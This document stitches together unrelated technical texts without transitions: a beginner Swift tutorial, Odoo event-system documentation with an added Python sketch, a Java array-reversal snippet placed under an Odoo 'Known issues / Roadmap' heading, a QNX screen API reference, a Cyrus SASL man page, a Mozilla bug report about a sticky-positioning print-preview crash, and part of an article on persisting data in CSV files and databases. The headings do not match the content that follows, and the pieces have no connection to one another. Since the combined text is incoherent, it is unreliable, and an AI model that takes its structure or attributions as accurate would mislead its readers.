login page with mysql using jsp pls i need a sample of login page to check username and password in mysql database.
thanks
bean - JSP-Interview Questions
bean what is use bean in jsp? Hi Friend,
Please visit the following links:
Hope
create login page using data from text file
create login page using data from text file I want to create login page using data store in textfile(data submit from register page to textfile) using jsp and servlet. Thanks
Spring Security Authorized Access Using Custom Login Form
Spring Security Authorized Access Using Custom Login Form
In this section, you will learn about authorized access using custom
login form in Spring... access by
providing customized Login form using Spring Security. User
Spring 4: Login Form using Spring MVC and Hibernate Example
Spring 4 MVC Login Example: Database driven login form using Spring MVC... are using the code discussed in the tutorial Spring 4 MVC
Login form without... of the
Spring 4 MVC login form example with backend database validation using
Use Java Bean In Servlets
of this Bean in servlet and using the set method of bean, we have passed some values...Use Java Bean In Servlets
In this you will learn how to use Java Bean in Servlets. For this purpose, we have created a Bean named 'Person' and defined three
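The tutorial excerpt above refers to a 'Person' bean with three properties that a servlet populates through its setters; the exact fields are not shown in the snippet, so the following is a hedged sketch with assumed properties (name, age, email) following the usual JavaBean conventions:

```java
// Hypothetical JavaBean in the spirit of the tutorial's 'Person' bean:
// a no-arg constructor plus getter/setter pairs, so a servlet (or a
// <jsp:setProperty> tag) can populate it and a JSP can read it back.
public class Person {
    private String name;
    private int age;
    private String email;

    public Person() {} // JavaBeans require a public no-arg constructor

    public String getName() { return name; }
    public void setName(String name) { this.name = name; }

    public int getAge() { return age; }
    public void setAge(int age) { this.age = age; }

    public String getEmail() { return email; }
    public void setEmail(String email) { this.email = email; }

    public static void main(String[] args) {
        // A servlet would typically follow this with:
        // request.setAttribute("person", p); then forward to a JSP.
        Person p = new Person();
        p.setName("Alice");
        p.setAge(30);
        p.setEmail("alice@example.com");
        System.out.println(p.getName() + " " + p.getAge() + " " + p.getEmail());
    }
}
```

The main method stands in for the servlet side; in the tutorial's flow the populated bean would be placed in request scope and rendered by the forwarded JSP.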
How to get the output of JSP program using Bean
visit the following link: to get the output of JSP program using Bean Hi
Kindly go... program for the above one by using Bean and i opened the Tomcat webserver
login How to create login page in jsp
Bean
visit the following links:
How to get the output of jsp program using Bean
;
Next i created JSP program for the above one by using Bean and i opened...How to get the output of jsp program using Bean Hello my Roseindia..." %>
<HTML>
<HEAD>
<TITLE>Use Bean CounterDbc Login Authentication
JDbc Login Authentication Please.. Send me one Login Authentication using ComboBox. From Servlet and jsp with sessions
I am new to sessions..." value="Login"><input type="reset" Value="Cancel" ></input><
servlet
servlet i want to create a login page with servlet using database mysql? only in servlet not in jsp plzz help me out
Admin and User Login JSP - JSP-Servlet
Admin and User Login JSP Respected Sir,
I am R.Ragavendran.. i need a JSP based program immediately.. In the home page, there must be a login page with username and password fields.. When the username and password is "admin
Spring Security customized login from database
Spring Security customized login from database
In this section, you will learn how to secure URL access using customized
login where password stored.../jsp/jstl/core"%>
<html>
<head>
<title>Login Page<
login page
login page pls say how to create a login page in jsp and mysql using netbaens
Hi Friend,
Please visit the following links:
Login form using Jsp in hibernate - Hibernate
Login form using Jsp in hibernate
Hai Friend,
As I new To hibernate, I'm facing problem in My project(JSP with hibernate).. My login form is working but the problem is ,when i enter correct user name and password
Login Form
is constructed using JavaServer Pages (JSP) technology.This
JSP shows Login... for a
login form using struts.
UserLoginAction Class: When you download Login...
Login Form
Login Form
Login Form I have 8 jsp pages.Each of them has three columns:Left... of the page.
Yes, you can use include file on every jsp page using <... of +,on clicking which a login form appears.
Only the middle column is different
login how to create login page in jsp
Here is a jsp code that creates the login page and check whether the user is valid or not.
1...;tr><td></td><td><input type="submit" value="Login">
login i am doing the project by using netbeens.. it is easy to use the java swing for design i can drag and drop the buttons and labels etc.. now i want the code for login.. i created design it contains the field of user
login hello i need some help please help how can identify admin from user when logging in? please make some answer and some explanation...
Please visit the following link;
jsp - JSP-Servlet
/loginbean.shtml
http...://
login page
login page hi i'm trying to create login page using jsp. i get no error while compiling but i get 404 while running the index.jsp. And i'm using.../html" pageEncoding="UTF-8"%>
JSP Page
Spring Security Authorized Access with Customized Login from Database
generated login form.
For Spring Security authorized access using... check user authenticity using customized login from database table(in
spring.../jsp/jstl/core"%>
<html>
<head>
<title>Login Page<
RichFaces: Login & Registration Application:
bean,
navigation rules, controller servlet...
RichFaces: Login & Registration Application
Login and Registration is one of the most required
login authentication - Java Beginners
login authentication I've designed the jsp page for login. Now I need to connect it with the bean and do authentication for the login for the "register" table in mysql. Can anybody help me with the code immediately
Login Authentication in JSP
page to show
the data fetched from the database. We are using Servlet to get data from the
database using MySQL and we are forwarding this servlet data...;
Example program using Select Box to show retrieved data
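The tutorials above validate the submitted username and password against a MySQL table from a servlet. Setting the database access aside, the core credential check can be sketched with an in-memory map; the user data and method names below are illustrative only, and a real servlet would query the table via JDBC and compare hashed passwords:

```java
import java.util.HashMap;
import java.util.Map;

public class LoginCheckDemo {
    // Stand-in for a users table; a servlet would load this via JDBC.
    private static final Map<String, String> USERS = new HashMap<>();
    static {
        USERS.put("admin", "secret");
    }

    // Returns true only when the username exists and the password matches.
    static boolean authenticate(String user, String password) {
        return password != null && password.equals(USERS.get(user));
    }

    public static void main(String[] args) {
        System.out.println(authenticate("admin", "secret")); // valid login
        System.out.println(authenticate("admin", "wrong"));  // bad password
        System.out.println(authenticate("guest", "secret")); // unknown user
    }
}
```

In the servlet version, a successful check would typically create a session attribute and forward to the welcome JSP, while a failure redisplays the login form.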
Stateless Session Bean Example
are declared using a
JSP page directive (enclosed within the <%@ %>.... Finally, a
JSP scriptlet invokes the enterprise bean's business methods, and JSP... web
clients that are JSP pages. If the web client were a servlet, you would
servlet javabean - JSP-Servlet
servlet javabean how to use a java bean in servelts .plese give me one example program using servelt mvc concept. Hi Friend,
Try...("person", p);
RequestDispatcher rd = req.getRequestDispatcher("/jsp/beandata.jsp
login and registration form using servlet and authentication through mysql
login and registration form using servlet and authentication through mysql i made a simple login and rgistration form using servlet... the Username:
Enter the Password:
Login here
import
Servlet Redirecting - JSP-Servlet
Servlet Redirecting Hi
I have made a main page with User name and password parameters, and when i try to direct it to the login page using...*;
public class Slogin extends HttpServlet implements Servlet
{
public void
Login Authentication using existing Active Directory.
Login Authentication using existing Active Directory. I need jsp code for login authentication of username and password using already existing Active Directory.
Here no need to create active directory.The JSP code should
Java bean example in JSP
Java bean example in JSP
... the procedure of
handling session and print a Hello world using Java Bean. The Bean....
The next step is to create a JSP page. This JSP page uses My bean package . Let
SERVLET
will be done by using jsp and servlet... Plz help me,im really tensed...........
...SERVLET I want to create a login form with one text box submit edit... to the servlet and if the user id is correct then a new page will be displayed with his
login and register - Java Beginners
login and register pls send me the code for login and register immediately Hi friend,
Please specify the technology you want code for login and register.
For example : JSP,Servlet,Struts,JSF etc
SERVLET AND JSP
SERVLET AND JSP If i want tio create a login form using SUBMIT,ADD...;For more information visit the following links:
Error in using java beans - JSP-Servlet
Error in using java beans I am getting the following error when I run the jsp code.
type Exception report
description The server...: Unable to load class for JSP
How to get Output for a Bean problem
How to get Output for a Bean problem Hello
Kindly tell me a simple Program on Bean to get the Output using JSP code
logout - JSP-Servlet
logout i want to know that (using only servlet technology not jsp) i create login page(html) ,registration.html, home page(servlet) and other pages. when i click the logout(hyperlink) then session is logout frequently
JSP AND SERVLET
JSP AND SERVLET I want to create a login form with user name... or her name. They can also edit their details by using edit button...;<input type="submit" value="Login"></td></tr>
<tr><
JSP bean set property
JSP bean set property
... you a code that help in describing an
example from JSP bean set property...:useBean> -
The < jsp:use Bean>
instantiate a bean class
servlet - JSP-Servlet
=res.getWriter();
out.println("");
out.println("");
out.println("LOGIN... using javascript please do reply i am waiting.
Thankyou for replying for mySP - JSP-Servlet
JSP Hi!
In my JSP page I am entering values and submitting the values. In common way I have to receive those values in another JSP using...);
String query = "insert into userlogin set login_name='"+loginname
Spring Login Example
This class controls login request by bean properties Than we create dispatcher-servlet.xml
to
handle all bean configuration. After this we create a web.xml file...Spring Login Example
In this section , we have shown a simple Spring loging
developing a Session Bean and a Servlet and deploy the web application on
JBoss 3.0
a Calculator Stateless Session Bean and
call it through JSP file and deploy...' to the
'ejb/CalculatorSessionBean' bean.
Writing JSP and Web/Ear component
Our JSP... the MyTestSession Session Bean developed in Lesson 3. Infact we will use the same
JSP-jdbc validation - JSP-Servlet
JSP-jdbc validation How to validate login email id using JSP, where...,
login application in jsp
function validateForm(theForm...;
}
login page
Login Form using Ajax
Login Form using Ajax
... using the Ajax (DOJO).
Lets develop a login application using Ajax...;/action>
Develop a Login Form Using Ajax : The GUI of the
application
Simpler streaming responses
March 27, 2013
Michael Snoyman
Yesod is built on top of WAI, which has always provided a means of creating efficient, streaming responses. Throughout Yesod's development, this functionality has always been present in one form or another. In Yesod 1.2, the goal is to make it as simple as possible to leverage this functionality.
Let's kick off with a simple example, and then drill into the details:
{-# LANGUAGE OverloadedStrings, TemplateHaskell, QuasiQuotes, TypeFamilies #-} import Yesod.Core import Data.Conduit import qualified Data.Conduit.Binary as CB import Control.Concurrent.Lifted (threadDelay) import Data.Monoid ((<>)) import qualified Data.Text as T import Control.Monad (forM_) data App = App mkYesod "App" [parseRoutes| / HomeR GET |] instance Yesod App fibs :: [Int] fibs = 1 : 1 : zipWith (+) fibs (tail fibs) getHomeR :: Handler TypedContent getHomeR = do value <- lookupGetParam "x" case value of Just "file" -> respondSource typePlain $ do sendChunkText "Going to read a file\n\n" CB.sourceFile "streaming.hs" $= awaitForever sendChunkBS sendChunkText "Finished reading the file\n" Just "fibs" -> respondSource typePlain $ do forM_ fibs $ \fib -> do $logError $ "Got fib: " <> T.pack (show fib) sendChunkText $ "Next fib is: " <> T.pack (show fib) <> "\n" yield Flush sendFlush threadDelay 1000000 _ -> fmap toTypedContent $ defaultLayout $ do setTitle "Streaming" [whamlet| <p>Notice how in the code above we perform selection before starting the stream. <p>Anyway, choose one of the options below. <ul> <li> <a href=?x=file>Read a file <li> <a href=?x=fibs>See the fibs |] main = warp 3000 App
Start simple: a standard response
Consider the following handler:
getHomeR :: Handler Text
getHomeR = return "Hello World!"
What exactly does Yesod do to make this into a response the client can see? The
important bit is the
ToTypedContent typeclass. Every handler function has
toTypedContent applied to its result. So let's look at the relevant classes
and types.
type ContentType = ByteString

data Content = ContentBuilder !Blaze.Builder !(Maybe Int)
               -- ^ The content and optional content length.
             | ContentSource !(Source (ResourceT IO) (Flush Blaze.Builder))
             | ContentFile !FilePath !(Maybe FilePart)
             | ContentDontEvaluate !Content

data TypedContent = TypedContent !ContentType !Content

class ToTypedContent a where
    toTypedContent :: a -> TypedContent

-- Relevant instance
instance ToTypedContent Text where
    toTypedContent t = TypedContent
        "text/plain; charset=utf-8"
        (ContentBuilder (Blaze.fromText t) Nothing)
So every response has to be convertible to a
TypedContent, which is two
pieces of information: the value for the
Content-Type response header, and
the body of the response. In our case, we use the
ContentBuilder constructor,
which lets us leverage
blaze-builder.
Use the Source
ContentBuilder isn't our only option. We could serve a file with
ContentFile.
ContentDontEvaluate is a modifier to deal with exceptions;
we'll discuss that a bit later. But for our streaming discussion, the most
interesting constructor is
ContentSource. This uses a
conduit
Source for
creating streaming data. Let's try out a minimal example:
getHomeR :: Handler TypedContent
getHomeR = return $ TypedContent "text/plain" $ ContentSource $ do
    yield $ Chunk $ Blaze.fromText "Hello World!"
We can use the
TypedContent and
ContentSource constructors directly. The
result isn't really anything more impressive than what we had previously. Let's
improve that, by streaming two files consecutively:
getHomeR :: Handler TypedContent
getHomeR = return $ TypedContent "text/plain" $ ContentSource $ do
    mapOutput (Chunk . Blaze.fromByteString) $ sourceFile "file1.txt"
    mapOutput (Chunk . Blaze.fromByteString) $ sourceFile "file2.txt"
We're guaranteed that our response will live in constant memory and will
properly free resources. We have to play with
mapOutput,
Chunk and
fromByteString to convert a stream of
ByteStrings to a stream of flushable
Builders.
Make it prettier
Having to muck around with those lower-level details isn't fun. Let's bump it up a level:
getHomeR :: Handler TypedContent
getHomeR = respondSource "text/html" $ do
    sendChunk ("Some Text" :: Text)
    sendChunk ("Hello & Goodbye" :: Html)
respondSource wraps up the tedium of dealing with the constructors directly.
sendChunk will send a chunk of content to the user, and can take as an
argument most common textual types (String, strict/lazy Text, strict/lazy
ByteString, and Html). But this doesn't play very nicely with overloaded
strings, since you need to provide explicit annotations. So we also have simple
type-specified wrappers as well:
getHomeR :: Handler TypedContent
getHomeR = respondSource "text/html" $ do
    sendChunkText "Some Text"
    sendChunkHtml "Hello & Goodbye"
We can also use
sendFlush to flush the buffer to the client immediately. And
we have the ability to use all common
conduit concepts to build up our
Source.
And one final but important point: the base monad for the
Source is
Handler, so you can perform arbitrary
Handler operations inside your
Source, such as looking up query string parameters.
Exceptions
Let's go back to non-streaming responses. Consider the following:
getHomeR :: Handler Html
getHomeR = return $ "Hello " <> name <> "!"
  where
    name = error "Oops, forgot to set the name"
We have an exception being sent from pure code. Let's see what Yesod does with this:
This is the result we want: the user receives a 500 status code to indicate that there was an error on the server. But how does this work? The pure exception should only be discovered after we already send our 200 status code and response headers, right?
In fact, Yesod does some fancy footwork behind the scenes, and fully evaluates
pure response bodies before sending any data to the user, specifically to
ensure that the user gets proper response codes. And this is also the purpose
of the above-mentioned
ContentDontEvaluate constructor: to give the user a
chance to override this behavior (e.g., for efficiency). For example, we can
modify our above code to read:
getHomeR :: Handler (DontFullyEvaluate Html)
getHomeR = return $ DontFullyEvaluate $ "Hello " <> name <> "!"
  where
    name = error "Oops, forgot to set the name"
When run like this, the client receives an empty response from the server instead.
"All very interesting," you might be saying, "but what does this have to do
with streaming responses?" Quite a bit, actually, as the same reasoning
applies. When using streaming responses, there's no way for Yesod to fully
evaluate your response body before sending them to the client. So if you throw
an exception in your
Source, the client will get a corrupted response. This
isn't to say you shouldn't use streaming responses, but you have to be careful.
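To make the failure mode concrete, here is a small hypothetical handler (not from the original post) built with the respondSource API described above; the exception fires after the first chunk, so the client has already received a 200 OK and part of the body:

```haskell
getHomeR :: Handler TypedContent
getHomeR = respondSource typePlain $ do
    sendChunkText "first chunk\n"
    sendFlush
    -- By this point the 200 status line, the headers, and the first
    -- chunk are already on the wire, so this exception can only
    -- truncate the body; it cannot become a 500 response.
    error "boom"
    sendChunkText "never sent\n"
```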
Logic before streaming
Exceptions aren't the only issue. You can't modify the status code or response
headers at all once you're inside the
Source. That means you can't perform
redirects, can't modify the session, or can't switch from a 200 OK response to
a 403 Forbidden response. The important point here is to perform your logic
before streaming.
getHomeR :: Handler TypedContent
getHomeR = do
    maybeFoo <- lookupGetParam "foo"
    case maybeFoo of
        Just "yesod" -> redirect ("" :: Text)
        _ -> return ()
    respondSource "text/plain" $ do
        sendChunkText "You didn't go to yesodweb.com"
We check our query string parameter and perform the redirect before calling
respondSource. Once we know that we're returning a normal response, we then
use
respondSource to create the body.
Database
Making it easy to create streaming database responses was probably my original
motivation here. I was never happy with the current recommended
approach, so I'm happy to
offer something simpler. Basically, we follow the exact same approach as with
normal streaming responses, but use the
respondSourceDB function instead of
respondSource. Take the following example, which just returns a list of
people from a database.
{-# LANGUAGE EmptyDataDecls #-} {-# LANGUAGE FlexibleContexts #-} {-# LANGUAGE GADTs #-} {-# LANGUAGE OverloadedStrings #-} {-# LANGUAGE QuasiQuotes #-} {-# LANGUAGE TemplateHaskell #-} {-# LANGUAGE TypeFamilies #-} import Control.Monad.Logger (runNoLoggingT) import Data.Conduit (awaitForever, runResourceT, ($=)) import Data.Text (Text) import Database.Persist.Sqlite (ConnectionPool, SqlPersist, SqliteConf (..), runMigration, runSqlPool) import Database.Persist.Store (createPoolConfig) import Yesod.Core import Yesod.Persist share [mkPersist sqlSettings, mkMigrate "migrateAll"] [persist| Person name Text |] data App = App { appConfig :: SqliteConf , appPool :: ConnectionPool } mkYesod "App" [parseRoutes| / HomeR GET |] instance Yesod App instance YesodPersist App where type YesodPersistBackend App = SqlPersist runDB = defaultRunDB appConfig appPool instance YesodPersistRunner App where getDBRunner = defaultGetDBRunner appPool getHomeR :: Handler TypedContent getHomeR = respondSourceDB typePlain $ selectSource [] [Asc PersonName] $= awaitForever toBuilder where toBuilder (Entity _ (Person name)) = do sendChunkText name sendChunkText "\n" sendFlush main :: IO () main = do let config = SqliteConf ":memory:" 1 pool <- createPoolConfig config runNoLoggingT $ runResourceT $ flip runSqlPool pool $ do runMigration migrateAll deleteWhere ([] :: [Filter Person]) insert_ $ Person "Charlie" insert_ $ Person "Alice" insert_ $ Person "Bob" warp 3000 App { appConfig = config , appPool = pool }
Obviously for our specific case, loading up the three names into memory would be acceptable. But for more complicated responses, some form of streaming is essential. This approach works very well in concert with the new streaming API for yesod-sitemap, allowing us to create a streaming XML response body from a database. The following is some real-life code from the School of Haskell:
getSitemapR :: Handler TypedContent getSitemapR = do AppContent {..} <- getYesod >>= readIORef . appContent sitemap $ runDBSource $ do yield $ SitemapUrl HomeR Nothing (Just Daily) (Just 1.0) mapM_ (yield . goPage) $ unpack acPageMap mapM_ (yield . goPost) acPosts yield $ SitemapUrl UsersR Nothing (Just Daily) (Just 0.6) yield $ SitemapUrl RecentContentR Nothing (Just Daily) (Just 0.6) selectSource [] [] $= CL.mapMaybeM (\(Entity _ Profile {..}) -> do mus <- getBy $ UniqueUserSummary profileHandle case mus of Just (Entity _ us) | userSummaryTutcount us > 0 -> return $ Just $ SitemapUrl (UserR profileHandle) Nothing (Just Weekly) (Just 0.5) _ -> return Nothing ) selectKeys [] [] $= CL.mapMaybeM (fmap (fmap goTutorial) . getCanonicalRoute) where goPage (pn, PageInfo {..}) = SitemapUrl (PageR pn) Nothing (Just Monthly) (Just 0.8) goPost Post {..} = SitemapUrl (BlogPostR y m s) (Just postDate) (Just Never) (Just 0.7) where PostKey y m s = postKey goTutorial route = SitemapUrl route Nothing (Just Monthly) (Just 0.6)
As the number of users and tutorials grows considerably, we want to avoid
loading all of that information into memory. The above code runs in constant
space, dealing with each individual user, and then each individual tutorial.
Under the surface, each SitemapUrl is converted into a stream of xml-types Events, and xml-conduit converts that stream into a stream of ByteStrings.
We have to be careful that our database queries are guaranteed to succeed. If
we use functions like
get404 inappropriately, we could generate incorrect
response bodies.
And yes, that means that the School of Haskell is currently running on Yesod 1.2.
18 October 2007 11:19 [Source: ICIS news]
The source did not specify the original schedule for the shutdown at the unit, which has a propylene capacity of 200,000 tonnes/year and is the first of its kind in southeast Asia. Impact on the downstream polypropylene (PP) line had been minimal, the source added.
This is not the first maintenance shutdown experienced at the complex, also known as an olefins conversion unit, which first came on stream in May last year.
PCS is a joint venture company of oil major Shell (50%) and Japan-Singapore Petrochemicals (50%), in which Sumitomo Chemicals is a major
jGuru Forums
Posted By: learner_java
Posted On: Thursday, July 17, 2003 05:41 AM
Hi all!
I don't really know how to start since I'm a new learner to JUnit.
I changed my mind... I wrote some Swing code to read information from a file and print it to the console using System.out.println(). I want to practice writing JUnit tests. I want to write a JUnit test program to check whether my Swing code reads the file OK and prints to the console OK. Can that be done?
here is my swing code:
import java.io.*;
import javax.swing.*;
import javax.swing.event.*;
import java.awt.event.*;
import java.util.Vector;

public class ReadEntityFile {
    private Entity[] entities;
    private Entity entity;
    private Vector vEntry;

    public ReadEntityFile() {
        entities = getEntity();
        for (int i = 0; i < entities.length; i++) {
            System.out.println("entitiesitem:" + entities[i].getName());
        }
    }

    public Entity[] getEntity() {
        try {
            String fn = "c:\\test.txt";
            File file = new File(fn);
            System.out.println("filename:" + file.getPath());
            if (!file.exists()) {
                System.out.println("File does not exist");
                System.exit(0);
            }
            BufferedReader input = new BufferedReader(new FileReader(file));
            String line = "";
            vEntry = new Vector();
            String name;
            while ((line = input.readLine()) != null) {
                Entity entity = new Entity();
                // get Entity structure of Entity class
                name = line.trim();
                entity.setName(name);
                vEntry.add(entity);
            }
            return (Entity[]) vEntry.toArray(new Entity[0]);
        } catch (Exception e) {
            System.out.println(e.toString());
            return new Entity[0];
        }
    }

    public static void main(String[] args) {
        ReadEntityFile te = new ReadEntityFile();
    }
}
and of course an Entity class; both of them work fine. But I'd like to write a JUnit test program and don't know how to start. Can you give me any brainstorms? thanks
Re: How do I write a JUnit Test
Posted By: Anonymous
Posted On: Friday, July 18, 2003 02:39 PM
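The answer body is missing from this archive. For what it's worth, a JUnit test for this code might look like the sketch below. It is illustrative only, not code from the thread: it assumes JUnit 4 on the classpath, and it assumes getEntity is refactored to take the file name as a parameter (the hard-coded c:\test.txt path and the System.exit(0) call make the class as posted hard to test).

```java
import org.junit.Test;
import static org.junit.Assert.*;
import java.io.File;
import java.io.FileWriter;

public class ReadEntityFileTest {

    @Test
    public void getEntityReadsOneEntityPerLine() throws Exception {
        // Arrange: write a known input file.
        File tmp = File.createTempFile("entities", ".txt");
        tmp.deleteOnExit();
        FileWriter w = new FileWriter(tmp);
        w.write("Customer\nOrder\n");
        w.close();

        // Act: assumes a hypothetical getEntity(String path) overload.
        ReadEntityFile reader = new ReadEntityFile();
        Entity[] entities = reader.getEntity(tmp.getPath());

        // Assert: the file content round-trips into Entity objects.
        assertEquals(2, entities.length);
        assertEquals("Customer", entities[0].getName());
        assertEquals("Order", entities[1].getName());
    }
}
```

The general pattern is: set up known input, call the method under test, and assert on its return value rather than on what it prints to the console.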
sourcecode Masem <CODE> #!/usr/bin/perl package Game::Life; ###################### # # Game::Life # v0.01 # Michael K. Neylon # mneylon-pm@masemware.com # May 28, 2001 # # Runs Conway's Game of Life # # Suggestions/Comments/Ideas are highly desired and can be # sent to the eamil address above. # # Change History: # # v0.01 - May 28, 2001 # - Initial Release # ###################### use strict; use Exporter; use Clone qw( clone ); use vars qw /$VERSION @ISA @EXPORT @EXPORT_OK/; @ISA = qw /Exporter/; @EXPORT = qw //; @EXPORT_OK = qw //; $VERSION = 0.01; my $default_size = 100; sub new { my $class = shift; my $self = {} ; # No args, set up a blank one $self->{ size } = shift || $default_size; $self->{ grid } = [ map { [ map { 0 } (1..$self->{ size } ) ] } (1..$self->{ size } ) ]; bless $self, $class; return $self; } sub toggle_point { my ( $self, $x, $y ) = @_; return ( $self->{ grid }->[$x]->[$y] = !$self->{ grid }->[$x]->[$y] ); } sub set_point { my ( $self, $x, $y ) = @_; $self->{ grid }->[$x]->[$y] = 1; } sub unset_point { my ( $self, $x, $y ) = @_; $self->{ grid }->[$x]->[$y] = 0; } sub place_points { my ( $self, $x, $y, $array ) = @_; return if ( $x < 0 || $x >= $self->{ size } || $y < 0 || $y >= $self->{ size } ); my ($i, $j); my $array_x = @$array; my $array_y = @{$$array[0]}; for ( $i = 0 ; $i < $array_x && $i+$x < $self->{ size }; $i++ ) { for ( $j = 0 ; $j < $array_y && $j+$y < $self->{ size }; $j++ ) { $self->{ grid }->[ $x + $i ]->[ $y + $j ] = ($array->[ $i ]->[ $j ] > 0) ? 
1 : 0; } } } sub get_grid { my ( $self ) = @_; return clone( $self->{ grid } ); } sub process { my $self = shift; my $times = shift || 1; for (1..$times) { my $new_grid = clone( $self->{ grid } ); for my $i ( 0..$self->{ size }-1 ) { for my $j ( 0..$self->{ size }-1 ) { $new_grid->[$i]->[$j] = $self->_determine_life_status( $i, $j ); } } $self->{ grid } = $new_grid; } } sub _determine_life_status { my ( $self, $x , $y ) = @_; my $n = 0; for my $i ( $x-1, $x, $x+1 ) { for my $j ( $y-1, $y, $y+1 ) { $n++ if ( $i >= 0 && $i < $self->{ size } && $j >= 0 && $j < $self->{ size } ) && ( $self->{ grid }->[ $i ]->[ $j ] ); } } return ( $self->{ grid }->[ $x ]->[ $y ] ) ? ( $n == 3 || $n == 4 ) : ( $n == 3 ); } =head1 NAME Game::Life - Plays Conway's Game of Life =head1 SYNOPSIS use Game::Life; my $game = new Game::Life( 20 ); my $starting = [ [ 1, 1, 1 ], [ 1, 0, 0 ], [ 0, 1, 0 ] ]; $game->place_points( 10, 10, $starting ); for (1..20) { my $grid = $game->get_grid(); foreach ( @$grid ) { print map { $_ ? 'X' : '.' } @$_; print "\n"; } print "\n\n"; $game->process(); } =head1 DESCRIPTION Conway's Game of Life is a basic example of finding 'living' patterns in rather basic rulesets. The Game of Life takes place on a 2-D rectangular grid, with each grid point being either alive or dead. If a living grid point has 2 or 3 neighbors within the surrounding 8 points, the point will remain alive in the next generation; any fewer or more will kill it. A dead grid point will become alive if there are exactly 3 living neighbors to it. With these simple rules, fascinating structures such as gliders that move across the grid, glider guns that generate these gliders, XOR gates, and others have been found. This module simply provides a way to simulate the Game of Life in Perl. C<new> - Creates a new Life game board; if passed a scalar, the game board will be a square of that size, otherwise, it will be a default 100x100 units. 
C<place_points> - Takes two scalars (indicating the position on the grid) and a reference to an array of arrays; this array is placed into the Life grid at the specified position, overwriting any data already there. Within the array of arrays, any non-zero values will be considered as a living square. C<toggle_point>, C<set_point>, C<unset_point> - Take two scalars that indiciate a specific grid position. These functions toggle, sets, or unsets the life status of the grid point passed, respectively. C<process> - If passed a number, runs the Life simulation that many times, else runs the simulation once. C<get_grid> - Returns a B<copy> of the Life grid as a reference to an array of arrays. =head1 HISTORY Revision 0.01 2001/05/28 Michael K. Neylon Initial revision =head1 AUTHOR This package was written by Michael K. Neylon =head1 COPYRIGHT Copyright 2001 by Michael K. Neylon =head1. =cut 1; </CODE> Simulates Conway's Game of Life in Perl <P> Comments are highly appreciated! Fun Stuff Michael K. Neylon (mneylon-pm@masemware.com) | http://www.perlmonks.org/index.pl?displaytype=xml;node_id=83813 | CC-MAIN-2015-06 | en | refinedweb |
How to change the robot_description paramter for the joint_trajectory_controller
Dear ROS community,
I am simulating an ABB IRB2400 robot arm in Gazebo, controlling it with MoveIt. This is working so far. My goal is to simulate two arms, so I moved them into different namespaces and gave their descriptions different names. The problem now occurring is that the joint_trajectory_controller can't find the 'robot_description' parameter on the parameter server.
The errors i get are:
[ERROR] [1500973451.323217096, 0.454000000]: Could not find parameter robot_description on parameter server [ERROR] [1500973451.323364757, 0.454000000]: Failed to parse URDF contained in 'robot_description' parameter [ERROR] [1500973451.323468398, 0.454000000]: Failed to initialize the controller [ERROR] [1500973451.323531930, 0.454000000]: Initializing controller 'arm_controller' failed [ERROR] [WallTime: 1500973452.325133] [1.452000] Failed to load arm_controller
I looked it up in the wiki and the code, and as far as I know there is no way to tell the joint_trajectory_controller to look for the robot description under a different name than 'robot_description'. Am I wrong? Is there a simple way I am overlooking?
If there is no way implemented, I would like to add one, but I could use some guidance on how to do that in a good way. Entering the robot description in the YAML file describing the controller would be the way I would choose, but I have not yet found the part of the code which passes the arguments from the YAML to the actual controller.
I managed to implement the use of a different robot description. It was quite easy after I understood how everything works. I copied the joint_trajectory_controller package and renamed it. Then you need to register it under that name. To get a different description I added a parameter to the server.
Could you please elaborate on what was required to "register it under that name"? | https://answers.ros.org/question/267332/how-to-change-the-robot_description-paramter-for-the-joint_trajectory_controller/ | CC-MAIN-2022-05 | en | refinedweb |
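As a side note for readers of this thread: a common alternative to copying and renaming the controller package is to load each arm's URDF inside its own namespace, since the controller typically resolves the relative name robot_description against the namespace it runs in. The snippet below is a hedged sketch along those lines; the namespace abb1 and the package/file names are placeholders, not taken from the question.

```xml
<launch>
  <group ns="abb1">
    <!-- Load this arm's URDF as /abb1/robot_description.
         Controllers and spawners started inside this group resolve
         the relative name "robot_description" to the namespaced one. -->
    <param name="robot_description"
           command="$(find xacro)/xacro '$(find my_abb_support)/urdf/irb2400.xacro'"/>

    <!-- Controller configuration and spawner, also inside the namespace. -->
    <rosparam file="$(find my_abb_support)/config/arm_controller.yaml" command="load"/>
    <node name="controller_spawner" pkg="controller_manager" type="spawner"
          args="arm_controller joint_state_controller"/>
  </group>
</launch>
```

A second `<group ns="abb2">` block with its own robot_description then gives the second arm an independent controller stack.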
5. Radio Buttons in Tkinter
By Bernd Klein. Last modified: 16 Dec 2021.
A radio button, sometimes called option button, is a graphical user interface element of Tkinter, which allows the user to choose (exactly) one of a predefined set of options. Radio buttons can contain text or images. The button can only display text in a single font. A Python function or method can be associated with a radio button. This function or method will be called, if you press this radio button.
Radio buttons are named after the physical buttons used on old radios to select wave bands or preset radio stations. If such a button was pressed, other buttons would pop out, leaving the pressed button the only pushed in button.
Each group of Radio button widgets has to be associated with the same variable. Pushing a button changes the value of this variable to a predefined certain value.
Simple Example With Radio Buttons
import tkinter as tk

root = tk.Tk()

v = tk.IntVar()

tk.Label(root,
         text="""Choose a programming language:""",
         justify = tk.LEFT,
         padx = 20).pack()
tk.Radiobutton(root,
               text="Python",
               padx = 20,
               variable=v,
               value=1).pack(anchor=tk.W)
tk.Radiobutton(root,
               text="Perl",
               padx = 20,
               variable=v,
               value=2).pack(anchor=tk.W)
root.mainloop()
The result of the previous example looks like this:
Improving the Example
In many cases, there are more than two radio buttons, and it would be cumbersome to define and write down each button individually. The solution is shown in the following example. We have a list of tuples, 'languages', which contains both the button texts and the corresponding values; the value is assigned to the variable 'v' when the corresponding language is clicked. We can use a for loop to create all the radio buttons.
import tkinter as tk

root = tk.Tk()

v = tk.IntVar()
v.set(1)  # initializing the choice, i.e. Python

languages = [("Python", 101),
             ("Perl", 102),
             ("Java", 103),
             ("C++", 104),
             ("C", 105)]

def ShowChoice():
    print(v.get())

tk.Label(root,
         text="""Choose your favourite programming language:""",
         justify = tk.LEFT,
         padx = 20).pack()

for language, val in languages:
    tk.Radiobutton(root,
                   text=language,
                   padx = 20,
                   variable=v,
                   command=ShowChoice,
                   value=val).pack(anchor=tk.W)

root.mainloop()
The result of the previous example looks like this:
Indicator
Instead of having radio buttons with circular holes containing white space, we can have radio buttons with the complete text in a box. We can do this by setting the indicatoron (stands for "indicator on") option to 0, which means that there will be no separate radio button indicator. The default is 1.
We exchange the definition of the Radiobutton in the previous example with the following one:
tk.Radiobutton(root,
               text=language,
               indicatoron = 0,
               width = 20,
               padx = 20,
               variable=v,
               command=ShowChoice,
               value=val).pack(anchor=tk.W)
We have added the option indicatoron and the option width.
